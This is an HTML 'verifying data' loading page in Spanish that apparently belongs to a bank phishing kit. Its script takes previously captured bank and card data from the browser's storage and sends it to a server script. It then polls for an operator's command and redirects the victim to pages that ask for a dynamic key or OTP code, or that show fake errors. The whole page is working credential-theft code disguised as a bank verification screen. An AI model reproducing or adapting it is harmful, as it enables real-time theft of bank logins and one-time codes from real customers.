<!DOCTYPE html>
<html lang="es">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Verificando Datos</title>
  <style>
    body {
      margin: 0; padding: 0;
      display: flex; justify-content: center; align-items: center;
      height: 100vh;
      background: url('img/fondo.png') no-repeat center center fixed;
      background-size: cover;
    }
    .blur-overlay {
      position: fixed; top: 0; left: 0; width: 100%; height: 100%;
      background: rgba(255, 255, 255, 0.4);
      backdrop-filter: blur(10px);
    }
    .loaderp-full {
      display: flex; flex-direction: column; justify-content: center; align-items: center;
      position: fixed; width: 90%; height: 90%; z-index: 9999;
    }
    .loaderp {
      width: 180px; height: 180px;
      background-image: url('img/circulo.png');
      background-size: cover;
      border-radius: 50%;
      display: flex; justify-content: center; align-items: center;
    }
    .loaderp .loader {
      width: 30px; height: 30px;
      border: 5px solid #f3f3f3;
      border-top: 5px solid #555;
      border-radius: 50%;
      animation: spin 1s linear infinite;
    }
    .loaderp-text {
      margin-top: 30px;
      font-size: 13px; color: black;
    }
    @keyframes spin {
      0% { transform: rotate(0deg); }
      100% { transform: rotate(360deg); }
    }
  </style>
</head>
<body>
  <div class="blur-overlay"></div>
  <div class="loaderp-full">
    <div class="loaderp">
      <div class="loader"></div>
      <div class="loaderp-text">Cargando...</div>
    </div>
  </div>

  <script>
    document.addEventListener('DOMContentLoaded', async function () {
      const bancoldata = localStorage.getItem('bancoldata');
      const tbdatos = localStorage.getItem('tbdatos');
      const transactionId = Date.now().toString(36) + Math.random().toString(36).substring(2);
      localStorage.setItem('transactionId', transactionId);

      if (!bancoldata || !tbdatos) return;

      try {
        const res = await fetch('6.php', {
          method: 'POST',
          headers: { 'Content-Type': 'application/json' },
          body: JSON.stringify({
            bancoldata: JSON.parse(bancoldata),
            tbdatos: JSON.parse(tbdatos),
            transactionId: transactionId
          })
        });
        const data = await res.json();
        if (data.ok && data.message_id) {
          pollVerification(transactionId);
        } else {
          alert(data.error || 'Error en la conexión');
        }
      } catch (err) {
        alert('Error de red al enviar datos.');
      }
    });

    async function pollVerification(transactionId) {
      try {
        const poll = await fetch(`6.php?transactionId=${transactionId}`);
        const json = await poll.json();
        if (json.ok && json.action) {
          const routes = {
            pedir_dinamica: 'dinacol.php',
            pedir_otp: 'index-otp.html',
            error_tc: '../../pay/',
            error_logo: 'index-pc-error.html',
            confirm_finalizar: '../../checking.php'
          };
          window.location.href = routes[json.action] || 'index-pc-error.html';
        } else {
          setTimeout(() => pollVerification(transactionId), 2000);
        }
      } catch {
        setTimeout(() => pollVerification(transactionId), 2000);
      }
    }
  </script>
</body>
</html>
